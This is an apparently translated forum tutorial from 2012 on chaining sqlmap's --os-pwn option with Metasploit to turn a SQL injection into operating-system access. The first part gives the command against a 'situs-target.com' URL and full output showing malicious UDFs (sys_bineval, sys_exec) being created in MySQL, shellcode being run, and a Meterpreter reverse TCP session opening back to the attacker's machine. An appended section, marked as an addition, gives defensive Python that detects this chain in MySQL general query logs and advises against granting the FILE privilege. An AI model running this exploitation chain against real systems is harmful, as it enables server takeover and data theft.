Integrating SQLMAP with METASPLOIT
As a framework, Metasploit has the ability to integrate with various other tools. As an example, this time I will integrate Metasploit with sqlmap, a vulnerability analysis tool for SQL databases :-bd

For a tutorial on sqlmap, see

http://indonesianbacktrack.or.id/forum/s...order=desc

Code:
root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://localhost.com/example.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

For now, sorry, I am using Dracos Linux as the example ... you can adapt it to your own pentest OS

Code:
root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://situs-target.com/pagevulner.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

some shit for a walker area ...

Code:
[INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[12:9:13] [INFO] fingerprinting the back-end DBMS operating system
[12:9:15] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[16:10:05] [INFO] testing if current user is DBA
[12:10:15] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[12:10:07] [INFO] checking if UDF 'sys_bineval' already exist
[12:10:08] [INFO] checking if UDF 'sys_exec' already exist
[12:10:10] [INFO] detecting back-end DBMS version from its banner
[12:10:12] [INFO] retrieving MySQL base directory absolute path
[12:10:13] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[12:10:15] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:29] [INFO] creating Metasploit Framework 3 multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [xxx.xxx.xxx.xxx]
which local port number do you want to use? [555]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[12:10:15] [INFO] creation in progress ... done
[12:10:16] [INFO] running Metasploit Framework 3 command line interface locally, please wait..

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12655 updated today (2012.12.06)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 555
LHOST => xxx.xxx.xxx.xxx
[*] Started reverse handler on xxx.xxx.xxx.xxx:555
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval',
please wait..
[*] Sending stage (749056 bytes) to xxx.xxx.xxx.xxx
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:9128 -> xxx.xxx.xxx.xxx:555) at Thu Dec 06

And meterpreter opens up ..
FOLLOW @DutaLinux
for more questions and sharing about security and Opensource only
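From a defender's point of view, the output above shows exactly which steps of the --os-pwn flow leave traces on the database server: the `CREATE FUNCTION ... SONAME` statements that register `sys_bineval` and `sys_exec`, and the later query that calls one of those UDFs to launch the shellcode. The Python example below is added here as an illustration and is not part of the original post, nor code from sqlmap or Metasploit. It scans constructed MySQL general query log lines (ISO-8601 timestamp format as written by `general_log_file` on MySQL 5.7+; the connection id 42, account `webapp` and library name `libsqlmapudf.so` are invented) for UDF registrations and command-execution UDF calls, correlates them per connection, and reviews rows in the shape returned by `SELECT name, dl FROM mysql.func` against an allowlist of UDFs the DBA expects to exist.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Set, Tuple

# UDF names registered by lib_mysqludf_sys and by sqlmap's --os-pwn flow
# (sys_bineval, sys_exec appear verbatim in the sqlmap output above).
COMMAND_UDFS = {"sys_exec", "sys_eval", "sys_bineval", "sys_set", "sys_get"}

# Constructed sample in MySQL general query log format: "<ts> <conn> <command> <argument>".
# Connection id, account name and library file name are invented for the example.
SAMPLE_LOG = """\
2012-12-06T12:10:10.000000Z\t   42 Connect\twebapp@10.0.0.5 on shop
2012-12-06T12:10:12.000000Z\t   42 Query\tSELECT @@basedir
2012-12-06T12:10:13.000000Z\t   42 Query\tCREATE FUNCTION sys_bineval RETURNS int SONAME 'libsqlmapudf.so'
2012-12-06T12:10:15.000000Z\t   42 Query\tCREATE FUNCTION sys_exec RETURNS int SONAME 'libsqlmapudf.so'
2012-12-06T12:10:48.000000Z\t   42 Query\tSELECT sys_bineval(0xdeadbeef)
2012-12-06T12:11:01.000000Z\t   43 Query\tSELECT name, price FROM products WHERE id = 7
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")
UDF_CREATE = re.compile(
    r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+(?P<name>\w+)\s+RETURNS\s+\w+\s+SONAME\s+'(?P<lib>[^']+)'",
    re.I,
)
UDF_CALL = re.compile(r"\b(?P<name>" + "|".join(sorted(COMMAND_UDFS)) + r")\s*\(", re.I)


@dataclass
class Finding:
    ts: str
    conn: int
    kind: str    # "udf_create" or "udf_exec"
    detail: str  # UDF name, plus the shared library for registrations


def scan_general_log(text: str) -> List[Finding]:
    """Flag UDF registrations and calls to command-execution UDFs in general log text."""
    findings: List[Finding] = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        ts, conn, sql = m.group("ts"), int(m.group("conn")), m.group("arg")
        created = UDF_CREATE.search(sql)
        if created:
            findings.append(Finding(ts, conn, "udf_create", f"{created.group('name')} <- {created.group('lib')}"))
            continue
        called = UDF_CALL.search(sql)
        if called:
            findings.append(Finding(ts, conn, "udf_exec", called.group("name").lower()))
    return findings


def connections_with_udf_chain(findings: Iterable[Finding]) -> Set[int]:
    """Connections that registered a UDF and then called a command-execution UDF (findings in log order)."""
    created: Set[int] = set()
    chained: Set[int] = set()
    for f in findings:
        if f.kind == "udf_create":
            created.add(f.conn)
        elif f.kind == "udf_exec" and f.conn in created:
            chained.add(f.conn)
    return chained


def review_udf_table(rows: Iterable[Tuple[str, str]], allowlist: Iterable[str] = ()) -> List[str]:
    """Given (name, dl) rows from `SELECT name, dl FROM mysql.func`, return UDF names not on the allowlist."""
    allowed = set(allowlist)
    return sorted(name for name, _dl in rows if name not in allowed)


if __name__ == "__main__":
    found = scan_general_log(SAMPLE_LOG)
    for f in found:
        print(f"{f.ts} conn={f.conn} {f.kind}: {f.detail}")
    print("connections with create->exec chain:", connections_with_udf_chain(found))
    # Constructed mysql.func rows; only my_len is a UDF the DBA installed on purpose.
    print("unexpected UDFs:", review_udf_table([("sys_exec", "libsqlmapudf.so"), ("my_len", "libcustom.so")], {"my_len"}))
```

The scan only works if the general query log is enabled (`general_log=ON`), which most production servers leave off; the `mysql.func` review needs no extra logging and can be run periodically. The "testing if current user is DBA" line in the output above points to the mitigation that makes the whole chain fail: the account a web application connects with should not hold the FILE privilege or write access to the `mysql` schema, since registering a UDF requires both writing the shared library and inserting into `mysql.func`.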


Integrating SQLMAP with METASPLOIT - by zee eichel - 12-06-2012, 04:47 PM